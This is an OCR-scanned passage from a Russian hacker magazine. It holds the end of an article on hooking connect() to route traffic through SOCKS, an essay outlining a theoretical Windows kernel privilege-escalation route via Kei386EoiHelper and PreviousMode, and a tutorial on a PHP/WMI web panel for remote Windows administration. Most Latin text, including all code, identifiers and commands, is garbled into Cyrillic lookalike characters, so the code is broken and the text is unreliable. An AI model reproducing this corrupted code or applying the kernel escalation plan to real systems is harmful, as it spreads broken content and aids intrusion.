• 1 байт — команда (соединиться с сервером — 0x01, привязать 
порт — 0x02); 

• 2 байта — порт удаленного сервера (либо порт, который нужно 
открыть); 

• 4 байта — ІР-адрес, к которому нужно присоединиться; 

• N+1 байт — С-строка длины N. содержащая идентификатор 
пользователя, завершенная нулевым байтом. N может быть равна 
нулю. 

После этого сервер отправит нам пакет, в котором укажет, все ли 
его устраивает: 



гекигп зоск; 

Не забудь — при коннекте к сокс-серверу нужно использовать 
оригинальную функцию соппеск ( ) , а то получится бесконечная 
рекурсия. 

На эти грабли я уже наступил, поэтому считаю своим долгом 
предупредить о них тебя. 

Вердикт 

Ну, вот и все — сегодня я научил тебя перехватывать АРІ-вызовы 
абсолютно легальным, с точки зрения программирования, путем, 
используя костыль от самого Місгозок. Как всегда, не оставлю 
тебя без задания — слабо реализовать тут 50СК55? (не бойся, 
пятый протокол ненамного сложнее, чем четвертый). 

Я надеюсь, ты понимаешь, что эту библиотеку можно использо- 
вать несколько в других, более «крупных», целях. Ну, ты меня 

ПОНЯЛ :). 

Только не забывай про законодательство, а то дяди в серой 
форме поставят вполне легальные хуки на все твои действия. 
Возможно, даже сроком в несколько лет. □с 



► 098 
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КОШМ АР НА УЛИЦЕ 
Ш00ѴѴЗ 

Типсы и триксы для системщиков 

ѳ«Сон разума рождает чудовищ», - гласит испанская пословица. 
Немного навыков системного программирования, ША Рго в умелых 
руках, ну и самое главное - исходные коды ѴѴіпсІоѵѵз ака ѴѴВК, и на 
свет начинают выползать кошмары из сна операционной системы 
ѴѴіпсІоѵѵз. Не терпится узнать, какие? 



ІЧНЫИ взгляд 
на обычные вещи 



Сколько раз в популярной ІТ-литературе описывался механизм 
перехода из гіпдЗ в гіпдО ОС ѴѴіпсІоѵѵз? Не счесть! При этом авторы, 
копипастя друг у друга фактически один и тот же текст, подробно 
или не очень описывали, что произойдет, если пользователь вызо- 
вет простую функцию СгеаІеРіІеО. 

Сегодня мы попробуем взглянуть на эту проблему с несколько неожи- 
данной стороны. По утверждениям знающих людей, существует один 
«ргооб о! сопсеріУный способ, позволяющий выполнять свой код на 
привилегированном уровне и пользоваться сервисами ядра напрямую, 
то есть в обход существующих ограничений, которые на тебя наклады- 
вает пользовательский (гіпдЗ) уровень. Да-да, ты не ошибся, — посмо- 
трим, можно ли ядро системы «подергать за вымя» напрямую. Все, 
что тебе для этого понадобится, это хорошие знания ядра, подсистемы 
ввода/вывода и изворотливость (или даже извращенность :)) ума. 



Речь пойдет об упомянутом мной механизме перехода из пользо- 
вательского уровня (гіпдЗ) в привилегированный уровень (уровень 
ядра). Попробуем поразмыслить и посмотреть на, казалось бы, со 
всех сторон облизанный и всем известный сценарий с другой сто- 
роны — вдруг мы что-нибудь оставили без внимания? 

Предположим, что у нас в руках некая 0-бау уязвимость, кото- 
рая позволяет скомпрометировать ядро и выполнить привиле- 
гированный код. Например, как в случае с эксплуатацией бага 
пІІ^ѵѵЗуБІеппОеЬидСопІгоІ в ѴѴіпсІоѵѵз. Одна из главных проблем, без 
решения которой вообще не обойтись, это необходимость изыскать 
способ возврата в нормальное гіпдЗ-состояние после того как ты 
выполнишь свой гіпдО-код. Существует два пути, которые здесь 
можно использовать. Первый — это самому реализовать код выхода 
с использованием асмовских инструкций ігеі или зузехіі. Второй — 
заюзать собственные процедуры ядра, которые оно использует для 
таких операций (то есть выхода из гіпдО в изегтосГный режим). 
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Известная уязвимость ядра — баг в КІЮиегуІпІегѵаІРгоНІе 






| НТТР://ѴѴѴѴѴѴ| 
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> Ііпкз 

Не забывай посещать 
МЗйІЧ — как програм- 
мист спешу заверить, 
что там можно найти 
ответы почти на все 
вопросы, которые 
будут возникать у 
тебя при системном 
код инге. 



Первый способ трудоемок и сложен в реализации, поэто- 
му в рамках этой статьи я его рассматривать не буду. 
Второй способ, наоборот, очень даже интересен и вдоба- 
вок может быть реализован с использованием многочис- 
ленных техник. Одну из них (попытку использования ядер- 
ной функции пІІКіЗегѵісеЕхіі) мы сейчас и рассмотрим. 
Для начала нам нужно будет найти функцию в ядре, так 
как она не экспортируется. Для этого целесообразнее 
всего использовать сигнатурный скан, если ты, конечно, 
умеешь пользоваться дизассемблером длин. Отмечу, 
что эта функция далеко не единственная, которую 
можно заюзать для наших коварных целей. При этом 
надо иметь в виду, что большинство операций перехода 
гіпдО-гіпдЗ (такие как вызов системных функций, преры- 
вания, исключения) используют стек ядра. Это, в свою 
очередь, дает нам возможность воспользоваться одной 
из таких системных функций, чтобы вернуться в пользо- 
вательский режим из переходов «гіпдО-гіпдЗ», которые 
вызываются различными событиями в системе. Главным 
требованием к такой функции является то, что она 
должна оканчиваться асмовскими инструкциями ігеі/ 
зузехіі, ответственными за переход между режимами. 
Таких функций несколько: 

• КіБузІетСаІІЕхіІ; 

• Кі5у5ІетСаІІЕхіі2; 

• КіЗегѵісеЕхіІ; 

• Кі5егѵісеЕхіі2; 

• КібеіТіскСоипІ; 

• Кеі386 Еоі Неірег; 

• КіТгар02, КіТгарОб, КіТгарСЮ; 

• КіСаІІЬаскРеІигп; 




То есть, теоретически, если мы не найдем 
КіБегѵісеЕхі!, то всегда можно будет попытаться найти 
адрес похожей функции — тем более, что архитектура 
ОС ѴѴіпсІоѵѵз это позволяет :). 

Опять лезем в ѴѴПК и внимательно читаем описа- 
ние каждой функции. И тут на свет вылезает крайне 
занимательная штука — оказывается, что функции 
КіЕхсерІіопЕхіІ и Кеі386 Еоі Н еірег выполняют практи- 
чески одинаковую работу! 

Вот описание КіЕхсерІіопЕхіІ: «Код функции пере- 
дается в конце обработки исключения. Его цель 
— восстановить состояние машины и продолжить 
исполнение потока. Если контроль будет возвращен 
в пользовательский режим и это будет постановка 
АРС в очередь, то контроль передается в процедуру 
отправки АРС». 

А вот описание Кеі386Еоі Неірег: «Код функции пере- 
дается в конце обработки прерывания (через макрос 
ЕХІТ_І ЫТЕРРЦІ РТ) . Он проверяет отправку АРС и выпол- 
няет макрос ЕХІТ_АІ_І_ для выхода из прерывания». 

Как видишь, в обоих случаях код отвечает за тран- 
закции, вызванные исключениями пользовательского 
режима и прерываниями. И тут возникает второй 
вопрос — если эти две функции выполняют очень 
похожие операции, то почему же они используются 
раздельно? При этом, заметь, создатели ѴѴПК честно 
предупреждают, что КіЕхсерІіопЕхіІ и Кеі386Еоі Н еірег 
идентичны. Все дело, оказывается, в волшебных 
пузырьках, которые скрыты в передаваемых макросу 
ЕХІТ_АІ_І_ параметрах: 




КіЗегѵісеЕхіС : 

ЕХІТ_АШ ІхГоКезЦогеЗедз , 

ЫоЕезСогеѴоІаСіІе 

КеіЗ 8бЕоіНе1рег : 

ЕХІТ_АЬЬ , , МоРгеѵіоизМосіе/ 



Примечание: только не подумай, что я запутался между 
КіЕхсерІіопЕхіІ и КіЗегѵісеЕхіІ, поскольку в тексте они 
вроде как постоянно друг друга подменяют. Для про- 
яснения ситуации я посоветую тебе курить файл \Ьазе\ 
пІоз\ке\і386\ігар.азт из ѴѴРК. 

Теперь взглянем на реализацию макроса ЕХІТ_АІ_І_, 
а точнее — на описания известных нам параметров: 
ІЧоРезІогеЗедз, ІЧоРезІогеѴоІаІіІе и ІЧоРгеѵіоизМосІе. 
Параметр ІЧоРезІогеЗедз означает, что обработчику 
выхода в пользовательский режим не нужно восстанав- 
ливать регистры 05, Е5, 03. Параметр ІЧоРезІогеѴоІаІіІе 
значит, что обработчику выхода не нужно восстанав- 
ливать так называемые волатильные регистры, а пара- 
метр ІЧоРгеѵіоизМосІе говорит обработчику выхода из 
прерывания, что следует отказаться от копирования 
значения РгеѵіоигМосІе (сохраненного в трап-фрейме) в 
одно из полей структуры КТНРЕАО. 

Ну, как тебе новость? Дальше будет еще интереснее. 
Когда речь идет о первых двух аргументах 
(ІЧоРезІогеЗедз и ІЧоРезІогеѴоІаІіІе), для нас неваж- 
но, есть они или нет. Эти параметры действительно 
важны для нормального функционирования опе- 
рационной системы, когда содержание регистров 
должно быть сохранено и/или восстановлено при 
наступлении определенных событий. В данном кон- 
кретном случае нам не нужно заботиться о сохра- 
нении контекста процессора — нам сейчас главное 
повысить уровень наших привилегий, а основной 
код будет выполнен в пользовательском режиме. 
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ЮСПАкгег — неплохой инструмент от ЕзадеІаЬ для поиска уязвимых драйверов 



Самое интересное — это параметр ІМоРгеѵіоизМосІе. Если ты 
не знаешь значение волшебного слова РгеѵіоизМобе, то бегом 
учить матчасть. Вкратце скажу: это изменяемый параметр, 
который говорит операционной системе (например, вызову 
пУКіБузІетЗегѵісе] откуда идет вызов кода: из пользовательско- 
го режима или из ядра. Если обработчик заподозрит неладное 
— будет сгенерировано исключение. Здесь нужно помнить такую 
вещь, что вызов системных Хѵѵ*-функций может происходить 
как из пользовательского режима, так и непосредственно самим 
ядром и драйверами. В первом случае используется инструк- 
ция 5Ѵ5ЕІМТЕР/5Ѵ5САЕЕ (или прерывание ІЫТОхЕ, которое было 
оставлено для совместимости вплоть до ѴѴіпбоѵѵз 7) для пере- 
хода в привилегированный режим. Во втором случае ядро может 
напрямую вызвать ту или иную системную функцию, для чего, 
как правило, используется КіЗузІетЗегѵісе. 
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Вот тут-то и проявляет себя РгеѵіоизМобе — она оказывается 
критической для функций обработки выхода в пользовательский 
режим. Ведь если при выходе из привилегированного режима ядра 
не установить значение РгеѵіоизМобе в ІІзегМосІе, а оставить его 
«как есть», то дальнейшая работа кода будет происходить именно 
в режиме ядра. И создатели МісгозоТС милостиво предоставили в 
наши коварные руки инструмент, который позволяет это сделать. 
Именно поэтому я акцентировал внимание на функции 
Кеі386 Еоі Н еірег — она идеально подходит на роль того трамплина, 
который позволит нам остаться в привилегированном режиме. При 
этом нужно помнить, что эта процедура использует оба стековых 
регистра — ЕВР и Е5Р. Несмотря на то, что в регистре Е5Р содер- 
жится валидный адрес (а он используется как обычный указатель 
стека до тех пор, пока мы не перехватили управление), нам нужно 
позаботиться о правильном для нас содержании регистра ЕВР. Это 
важно, так как при атаке переполнения буфера в случае выхода по 



инструкции РЕТ значение стека переписывается атакующим кодом. 

К счастью для нас, валидное значение ЕВР может быть легко вос- 
становлено при помощи того же регистра Е5Р: МОѴ ЕВР, Е5Р. 
Подведем итоги и определим приблизительный план действий: 
во-первых, нам нужно отыскать базовый адрес загрузки ядра, 
затем с помощью сигнатурного скана найти там адрес функции 
пі!Кеі386ЕоіНеІрег, далее — заставить систему ее выполнить 
(например, вызвать переполнение буфера). Не забудем подправить 
значение регистра ЕВР, прыгнуть на функцию пі!Кеі386ЕоіНеІрег 
и продолжить выполнение своего кода уже в привилегированном 
режиме. Примерно так :). 

Рго & СОП5 

Как видно из содержания этой статьи, существует несколько 
ограничений, которые делают такой сценарий маловеро- 
ятным, но все же вероятным. Нам нужно каким-то образом 
(скажем, переполнением буфера, которое сработает внутри 
системного обработчика) сгенерировать исключение. Такое 
развитие ситуации возможно, например, при каких-либо 
уязвимостях ядра. Таким образом, этот метод теоретически 
должен позволить выполнение твоего кода на привилегиро- 
ванном уровне. Однако, чтобы его завести, нужен хороший 
толчок, роль которого и должна сыграть некая гипотети- 
ческая уязвимость, которая сможет вызвать переполнение 
буфера в режиме ядра. А найти такую — ой как не просто. По 
признаниям самих же разработчиков ОС ѴѴіпбоѵѵз, им хватает 
времени лишь на то, чтобы проконтролировать и протестить 
только код ядра. Значит ли это, что надежность и стабиль- 
ность остальных компонентов остается без внимания? Судя 
по количеству найденных уязвимостей в ОС ѴѴіпбоѵѵз — очень 
даже может быть. 

Заключение 

Не о самых простых вещах идет речь в этой статье. Однако понять 
их не так трудно. Иногда это похоже на собирание мозаики, когда 
детали, которые раньше тебе казались непонятными, вдруг стано- 
вились на свои места в общей картине. 

Я не утверждаю, что метод, описанный в статье, будет работоспо- 
собным. Хотя мне кажется, что ІТ-спецам, занятым в сфере безопас- 
ности, уже пора начать искать нечто подобное в сети. 

Удачного компилирования и да пребудет с тобой Сила! ~г 
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■ Иѵісіогдиіу ѵісІогдигуГСдтаіІ.сот 




РУЛИМ ФОРТОЧКАМИ 
ЧЕРЕЗ РНР 

ЙЙТОЖ Д 0 СТ У П к системе С ПОМОЩЬЮ 



о Находясь далеко от консоли, часто возникает необходимость в 
удаленном управлении машиной. Посмотреть работающие 
процессы, завершить сеанс пользователя, перезапустить зависший 
демон, запустить скрипт или перезагрузить хост. 



Для удаленного управления форточками на сегодня существует 
стандартное подключение к удаленному рабочему столу по про- 
токолу РШР и множество ПО от сторонних производителей. Однако 
эти способы требуют отдельного подключения к каждому управ- 
ляемому объекту, а также установки на них серверных частей, 
что зачастую блокируется антивирусным ПО (впрочем, о чем это 
я, ведь мы планируем управлять исключительно своей личной 
машиной?). 

Но при подключении к своему компьютеру с помощью публичной 
точки доступа вероятен облом — некоторые порты ТОР могут быть 
запрещены. Выход из этой ситуации я нашел в решении постро- 
ить ѵѵеЬ-сайт, который будет размещен либо на управляемой 
машине, либо на любой машине домена, на которой запущен сер- 
вер с админскими правами. 

Естественно, доступ к сайту ограничим паролем, а подключаться 
к нему будем по протоколу 55І_. 

К делу! 

В качестве ѵѵеЬ-сервера применяется сборка «Денвер» (джентль- 
менский набор ѵѵеЬ-разработчика) с РНР интерпретатором версии 

5.2 ( ѵѵѵѵѵѵ. сіепѵѵе г. ги ). 



Развернем ѵѵеЬ-сервер на управляемой машине, либо на любой 
машине домена под учеткой с административными правами 
доменного админа. 

Денвер устанавливается крайне просто — на сайте разработчика 
есть подробная инструкция. В моём случае я просто установил 
диск с папками ѵѵеЬ-сервера как диск А, подключающийся при 
старте системы (флоппи-дисковода у меня нет и в ВІ05 он отклю- 
чен). Каталог ѵѵѵѵѵѵ, показанный на рисунке «Содержимое нашего 
каталога», будет содержать файлы (рбр-скрипты) нашей системы 
удаленного управления. Для обеспечения безопасности досту- 
па к сайту управления необходимо в каталоге ѴѴѴѴѴѴ разместить 
файлы .Ыассезз и .ЫраззѵѵсІ со следующим содержимым (для 
.Ыассезз): 

<Рі1ез .ЦЦраззж1> 
сіепу Ргот аіі 
</Рі1ез> 

АиЫіТуре Вазіс 

АиЫШате «РгіѵаЪе гопе. Опіу і:ог АсІтіпізВгаЪогз ! » 
АиЪШзегРіІе а : \Ьоше\1оса11іозЦ\ѵ^Аѵ\ .ЪРраззмсІ 
гедиіге ѵаіісі-изег 
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Вывод информации из ВІ05 (выделено крас- 
ным) 



Здесь мы прописываем тип аутентификации (базовая) 
и путь к файлу с паролями. 

Файл .біраззѵѵсі содержит зашифрованные пароли поль- 
зователей (файл создается с помощью утилиты ЫраззѵѵсІ. 
ехе из комплекта дистрибутива ѴѴЕВ-сервера Арасбе), вот 
пример его содержимого: 

ѵлпішіп : $арг1$дд1 $ 8 і...рОКНкОѵЕзС> 2 АкдЗУО 

чшііорег : $арг1$йхТ6 . / . . $Х..МР94оКдОІКХККзКгПО 

У меня используются два юзера — в дальнейшем первый 
имеет право на перезагрузку и отключение машин, а вто- 
рой — не имеет. 

Если у тебя нет фиксированного ІР-адреса р то для того, 
чтобы наш сайт управления был виден извне, необходимо 
зарегистрироваться на сіупбпз.сот (либо аналогичном 
сайте, предоставляющем услугу динамического 0І\І5), а 
затем в настройках маршрутизатора (например, для ОЫпк 
при А05І_ подключении) прописать полученный логин и 
пароль (см. картинку). 

Для доступа снаружи на наш ѵѵеЬ-сервер необходимо 
также добавить ІР-машины с сайтом в РМ2-зоне. 

Разбираем принцип работы 

Теперь расскажу о том, как осуществляется мониторинг 
либо управление машинами через наш сайт. Для этого 
мы используем подключение из РНР к подсистеме ѴѴМІ 
виндовых машин посредством создания новых СОМ- 
объектов. 

ѴѴМІ (инструментарий управления осями ѴѴіпсІоѵѵз) предо- 
ставляет нам возможность подключаться к следующим 
провайдерам: 

• Бзргоѵ.сііі, провайдер каталога Аскіѵе 
Бігесбогу (Аскіѵе Бігесбогу ргоѵісіег) , позво- 
ляет обращаться к Аскіѵе Бігескогу как к 
объекту ѴѴМІ ; 

• Ыбеѵб.сІІІ, провайдер журнала событий (Еѵепб 
Ьод ргоѵісіег) , дает возможность управлять 
журналом событий; 

• ѴПэешрегЕ .<311 , провайдер системных счетчиков 
(Регіотапсе Соипбег ргоѵісіег) — обеспечивает 
доступ к счетчикам произоводительности; 

• Зббргоѵ.сІІІ , провайдер реестра (КедізРгу 
ргоѵісіег) , позволяет осуществлять чтение и 
изменение реестра; 

• Зшпріпсі .<311 , провайдер 8ШР-устройств 
(8ШР ргоѵісіег) , открывает шлюз доступа к 
ЗіІМР (8ішр1е ЫеРѵгогк МападешепР РгоРосоІ) ; 

• Ѵ'йпіргоѵ.сііі , провайдер драйверов устройств 
(Ж)М ргоѵісіег) , дает возможность полу- 
чать информацию низкого уровня о драйверах 
устройств Міпскжз Бгіѵег Мосіеі (ТОМ) ; 

• Сішѵ/іп32 . сЗ.11 , провайдер подсистемы Ш_п32 
(Шіп32 ргоѵісіег) , обеспечивает доступ к 
информации о компьютере, ОС, подсистеме без- 
опасности, дисках, периферийных устройствах, 



0 [Компьютер] 

Ѳ^ДА:] Локальный диск 
Ѳ [гіепѵѵег] 

Б у [Ьоте] 

[сді-дІоЬ] 

0 у} [ІосаІпоЕІ] 

/] 

[ітр] 

В . [и5г] 



Содержимое нашего каталога 



файловых системах, файлах, папках, сетевых 
ресурсах, принтерах, процесах, сервисах и так 
далее; 

• Мзіргоѵ. <311 , провайдер установленного ПО 
(Мпскжз Іпзкаііег ргоѵісіег) — позволяет 
получать информацию об установленном ПО. 

Для вывода на ѵѵеЬ-страницу информации о текущем 
состоянии машины (память, процессы, службы), а также 
для выполнения некоторых административных действий 
необходимо написать функции, которые будут вызывать- 
ся с параметрами (имя машины или ІР-адрес), а затем 
выводить результат своей работы в соответствующее 
поле ѵѵеЬ-страницы. Самые интересные и используемые 
в рамках нашего проекта функции будут требовать обра- 
щения к провайдерам подсистемы ѴѴіп32 и провайдеру 
реестра. 

Работаем с реестром 
удаленно 

На сегодня у меня реализованы как мониторинговые, 
так и управляющие функции. Из мониторинговых стоит 
выделить функцию получения и вывода информации 
о версии ВІ05, производителе и модели материнской 
платы (полный текст функции в исходнике — файл Ьіоз. 
рбр). Данный функционал реализуется с помощью соз- 
дания нового СОМ-объекта подключением к провайдеру 
ЗФРедРгоѵ подсистемы ѴѴМІ. Все рассмотренные функ- 
ции вызываются с переменной $зегѵег, которая содержит 
имя управляемой удаленной машины в локальной сети 
либо ее ІР-адрес. 

Работа с провайдером реестра 

$оЬф = пем СОМ( 

'ѵ/іпшдшбз : {ітрегзопаЦіопЬеѵе 1 =ітрегзопаке} // ' 
.$зегѵег. ' /гоок/сіеіаиік : ЗксІКедРгоѵ' ) ; 



$оЬц ->дек8кгіпдѴа1ие (НКЬМ, $кеуракЪ.1 , 
$кеуѵаіие_беі , $кеу) ; 
еско " ВІОЗ геіеазе баке: " . $кеу . " \г\п" ; 

$окц ->дек8кгіпдѴа1ие (НКЬМ, $кеуракЬ.2 , 

$ кеу ѵа 1ие_шЬ_шобе 1 , $ кеу ) ; 
есію "МаіпЬоагб тосіеі: " . $кеу . "\г\п" ; 

Таким образом, после создания нового СОМ-объекта 
методом деіЗігіпдѴаІие мы читаем раздел реестра НКІ_М 
(выбор раздела реестра задается константой, в нашем 
случае — объявлением беііпе ( 1 нкьм' , 0x80000002) ,-). 
При необходимости читать другие разделы реестра ука- 
зываем другие константы: 




НТТР://ѴѴѴШ 



■ I 

> Цпкб 

На диске лежат полные 
исходные коды вышеу- 
помянутых функций. 
Для их запуска тебе 
понадобится интер- 
претатор версии РНР5. 
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Настройка сіупатіс сіпз на роутере 

(полный текст функции в исходнике — файл сріыпіо.рИр), для 
этого сделаем так: 

Работа с пространством имен /гооІ/сітѵ2 и провайдером 
ѴѴіп32_Ргосез50Г 

$оЬд = петл СОМ ( 

' міптдтВз: { ітрегзопаВіопЕеѵе1=ітрегзопаВе} // ' 

. $зегѵег . ' /гооВ/сітѵ2 ' ) ; 

$рс = 0; 



Вывод информации о СРІІ (окно отладки) 



Вогеасй ( $оЬд ->іпзВапсезоі: { ' Міп32_Ргосеззог ' ) аз $шр) 



{ 



СопзВ НКЕУ_СЬА83ЕЗ_КООТ 
СопзВ НКЕУ_СітКЕМТ_ІІЗЕК 
СопзВ НКЕУ_ЬОСАЬ_МАСНІ№І 
СопзВ НКЕУ_ЦЗЕКЗ 
СопзВ НКЕУ_СШКЕШ_С(ЖРІС 



= 0x80000000 
= 0x80000001 
= 0x80000002 
= 0x80000003 
= 0x80000005 



есЪ.о "Ргосеззог ( " . + + $рс . " ) \г\п" ; 

есію "Ыаше: " . Вгіт( ётр-Шате )." @ " . 

$тр->СиггепВС1оск8реес1 . " МН 2 \г\п" ; 

есію " СРЮ Ьоасі: " . $тр->ЬоасІРегсепВаде . ,, %\г\п ,, і 



В результате работы скрипт выводит нам следующие данные (в моем Здесь мы создаем новый СОМ-объект и, обращаясь к методам про- 
случае): вайдера ѴѴіп32_Ргосе550г р получаем нужную нам информацию: 



ВІОЗ геіеазе йаВе: 04/30/10 

МаіпЪоагсІ тапиВасВигег : СідаЪуВе Тескпоіоду Со. , ЬВсІ. 
МаіпЪоагсІ тосіеі: С31М-Е32Ц 

Кроме используемого метода деіЗігіпдѴаІие существуют дополнитель- 
ные методы работы с провайдером ЗісІПедРгоѵ, среди них: 

• СеВВіпагуѴаІие — чтение значений типа ВШАКУ; 

• СеВБШВГ)Ѵа1ие — чтение значений типа ШОРТ); 

• СеВЕхрапйесІЗВгіпдѴаІие — чтение значений типа 
ЕХРАШЕБ ЗТКІШ; 

• СеВМиІВіЗВгіпдѴаІие — чтение значений типа МВПУП 
ЗТКІШ; 

• СгеаВеКеу — создание ключа реестра; 

• ЗеВВіпагуѴаІие — запись значения типа ВШАКУ; 

• ЗеЦБШКБѴаІие — запись значения типа ШОКЕ); 

• ЗеВЕхрапйесІЗВгіпдѴаІие — запись значения типа 
ЕХРАШЕБ ЗТКІШ; ЗеВМиІВіЗВгіпдѴаІие — запись значения 
типа МШТІ ЗТКІШ; 

• ЗеВЗВгіпдѴаІие — запись строкового значения; 

• БеІеВеКеу — удаление ключа; 

• БеІеВеѴаІие — удаление значения ключа; 

• ЕпитКеу — получить перечисление ключей реестра; 

• ЕпитѴаІиез — получить перечисление значений ключей; 

• СЬескАссезз — проверка прав доступа к ключу реестра. 

В данном случае они не используются, а подробнее узнать об их при- 
менении можно в великом М50Ы. 

Мониторим систему удаленно 

Для осуществления функций мониторинга системы потребуется 
работать с пространством имен ѴѴМІ (/гооі/сітѵ2), что даст нам 
возможность обращаться к необходимым провайдерам ѴѴі п32_ 
Ргосеззог, ѴѴі п32_0 регаіі пдВузІепп , ѴѴі п32_РегбРогта1;1;есІ 0а1;а_ 
РегЮ 5 _ 5 у 5 *ет, \Л/іп32_0регаІіпд5у5Іет, \А/іп32_Ргосез5 р ѴѴі п32_ 
Зегѵісе. Итак, получаем информацию о центральном процессоре 
системы (ОРУ), включая его загрузку в процентах и данные СРІІЮ 



Ргосеззог (1) 

Ргосеззог Ій: ВРЕВРВЕРО 0 0 1 0 67А 
Ыате: РепВіит(К) Биаі-Соге 

СРЦ Е5300 @ 2.60СН2 @ 1196 МН 2 

СРЦ Ьоасі: 18% 

СРЦ ЗВаВиз : ОК 
СРІІ ЗВерріпд: 

СРІІ Кеѵізіоп: 5898 
ЗузВет Ыате : СІІ2У 

Данные о температуре процессора мы можем получить, обра- 
тившись к пространству имен /гооі/ѴѴМІ и провайдеру М5Асрі_ 
ТЬегтаІ2опеТетрегаІиге (полный текст функции в исходнике — файл 
сри_1етр.рЬр). Получение актуальной температуры СРІІ работает не 
на всех материнских платах ПК, зато прекрасно работает на ноутах. 

Работа с пространством имен /гооІ/ѴѴМІ и провайдером 
М5Асрі_ТИегта12опеТетрегаІиге 

$оЬд = пем СОМ ( 

ШіптдтВз: { ітрегзопаВіопЬеѵе1=ітрегзопаВе} / / ' 

. $зегѵег . ' /гооВ/ШІ ' ) ; 

ВогеасЪ. ( $оЪз ->іпзВапсезоВ ( 

' М8Асрі_ТЬегтаІ2опеТетрегаВиге ' ) аз $тр) 

{ 

есВю "<рге>\г\п" ; 

$сВетр= ( $тр->СиггепВТетрегаВиге) ; 
есію <«Ь>СиггепВ СРВ) ВешрегаВиге: " 

. ( $сВетр — 2732) /10 . "С" . " \г\п" ; 

} 

Здесь перед выводом на страницу мне пришлось перевести темпе- 
ратуру из кельвинов в привычные русскому глазу единицы Цельсия. 
Двигаемся дальше и с помощью старого доброго пространства 
имен /гооі/сітѵ2 получаем информацию об установленной оси, 
сервис-паках и аптайме. Всё это реализовано в функции, исход- 
ник которой ты можешь найти в файле ирбте.рЬр. Здесь исполь- 
зованы методы провайдеров ѴѴіп32_0регаІіпд5у5Іет и ѴѴіп32_ 
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"ТОБЕНАгігаІЯ" - УДйгаННЙГС «ДМИНИСТрНрЙНпИ# 




Пример реализации функций управления в виде системы 



Рег1 : Рогта1;1;есЮа1;а_РегЮ5_5у5^ет. Для перевода секунд при ото- 
бражении ирііте используется функция іЪгтаМіте($Іетр) р текст 
функции ищи в исходнике — файл Ьитап_5есопсІ.рЬр. 

Выводим параметры 05'и и ирііте 

іогеасЬ. ( $оЬд ->іпзіапсезоі 

( , Шіп32_ОрегаЦіпд8узЦеш' ) аз $тр ) 

{ 

$іетр= ($тр->Ыате) ; 

есію "ОЗ пате: " . зиЪзіг ( $іетр , 0 , -40 ) . " \г\п" ; 

$іетр2= ( $тр->ЗегѵісеРаскМаз огѴегзіоп) ; 
есію " Зегѵісе раск: " . $іетр2 . " \г\п" ; 

} 

іогеасЬ. ( $оЪ;і ->іпзіапсезоі 

( , Шп32_Ре^іЕо^таііес1^аіа_Ре^іОЗ_Зузіет , ) аз $тр) 

{ 

$іетр= ( $тр->ЗузіетЬрТіте) ; 

есію "Зузіет ирііте: " . іогтаі_ііте ( $іетр) . " \г\п" ; 

} 

Результаты работы наших скриптов: 

ОЗ пате: Місгозоіі Мпсісжз Зегѵег 2 008 Е2 Епіегргізе 
Зегѵісе раск: 0 

Зузіет ирііте: 23іюиг 32тіп 42зес 

Таким образом, с помощью языка РНР в связке с ѴѴМІ мы можем 
получать любую информацию о ПК удаленно. Примеры реализации 
других функций (таких как просмотр, запуск и остановка процессов и 
служб, получение 0145 записей из сервера, перезагрузка и заверше- 
ние работы управляемой машины) можно найти в исходниках катало- 
га іпсіибе. 

Рулим виндами удаленно 

Для реализации перезагрузки ПК необходимо обратиться к про- 
странству имен /гооі/сітѵ2 и вызвать метод РеЬооІ провайдера 
‘ѴѴіп32_0регаІіпд8у5Іепп. Для завершения работы необходимо вызвать 
метод ЗЬиШоѵѵп. 

Удаленная перезагрузка системы 

$оід = пеѵѵ СОМ ( 

' тптдтіз : { ітрегзопаііопЬеѵе1=ітрегзопаіе , ( ЗЪиіскжп) } / / ' 

. $ зегѵег . ' /гооі/сітѵ2 ' ) ; 
іогеасЬ ( $окд ->іпзіапсезоі 

( 'Ш_п32_0регаііпд3узіет' ) аз $тр) 

{ 

есЬо "<рге>\г\п" ; 

есію "<Ъ>ЕеЪооііпд іттес!іаіе1у\г\п</Ъ>\г\п</рге>" ; 
$сіетр= ( $тр->ЕеЪооі) ; 

} 

Для просмотра запущенных служб: 

Список запущенных служб 

$ргосезз = $оЬд ->ехесдиегу 

( " ЗЕЬЕСТ * ЕЕОМ Мп32_3егѵісе" ) ; 



іогеасЬ. ( $ргосезз АЗ $гоѵ^ ) 

{ 

есЬо "<рге>\г\п"; 
есЬо "МАМЕ: " . $гоѵ^->Мате 
\г\пЫ8РЬАУ ЫАМЕ: " . зігіоіомег ( $гом->Ьізр1ауМате) . " , 
\г\пРАТН : " . зігіоіомег ($гом->РаіЬМате ). ", 

\г\п8ТАТЕ : " . зігіоіомег ( $гом->зіаіе ) . "<Ьг/>" ; 

} 

Для просмотра процессов: 

Список запущенных процессов 

$ргосезз = $окд ->ехес<диегу 

("ЗЕЬЕСТ * ЕЕОМ Мп32_Ргосезз " ) ; 
іі ( $ргосезз->соипі > 0 ) 

{ 

іогеасЬ ( $ргосезз АЗ $гсж ) 

{ 

есЬо "<рге>\г\п" ; 

есЬо " РІЬ: " . $гоѵ7->ргосеззісІ. " , 

\г\пРЕОСЕЗЗ ЫАМЕ: " . зігіоіомег ( $гоѵ7->пате 

\г\пМЕМОЕУ 113 АСЕ : ". питЬе г_ іо гтаЬ 

( $гоѵ\г->ѵгогкіпдзеізІ 2 е )."<Ьг/>" ; 

} 

} 

Для запуска или остановки служб используем методы ЗіагіЗегѵісе и 
ЗіорЗегѵісе объекта ѴѴіп32_5егѵісе: 

Запуск служб 

$ргосезз = $обд ->ехесдиегу 
("ЗЕЬЕСТ * ЕЕОМ Мп32_3егѵісе Шіеге 
Ыате= ' $зегѵісезпате ' " ) ; 

іогеасЬ ($ргосезз АЗ $гом) 

{ 

$гом->ЗіагіЗегѵісе ( ) ; 
есЬо "Зегѵісе зіагіесі! " ; 

} 

А вот для запуска процессов придется использовать метод Сгеаіе 
объекта \д/іп32_ргосе55: 

Запуск процессов 

$оЪ;і_ѵ\тп32_ргосезз=петлг СОМ( 

’міптдтіз: { ітрегзопаііопЬеѵеі=ітрегзопаіе} // ' 

. $зегѵег . ' /гооі/сітѵ2 :Мп32_Ргосезз * ) ; 
$оЬз_ѵ^іп32_ргосезз->Сгеаіе ( $ргосеззпате , 

Ыиіі ,Ми11 , 1пдРгосеззІЬ2 ) ; 
есЬо " Ргосезз сгеаіесі!"; 

Заключение 

Таким образом, используя все возможности ѴѴМІ-провайдеров из 
РНР, можно получать и публиковать на ѵѵеЬ-сайте любую информа- 
цию об удаленных машинах, а также практически без ограничений 
ими управлять, манипулируя процессами, службами и реестром. 

В рамках статьи показаны лишь наиболее простые варианты приме- 
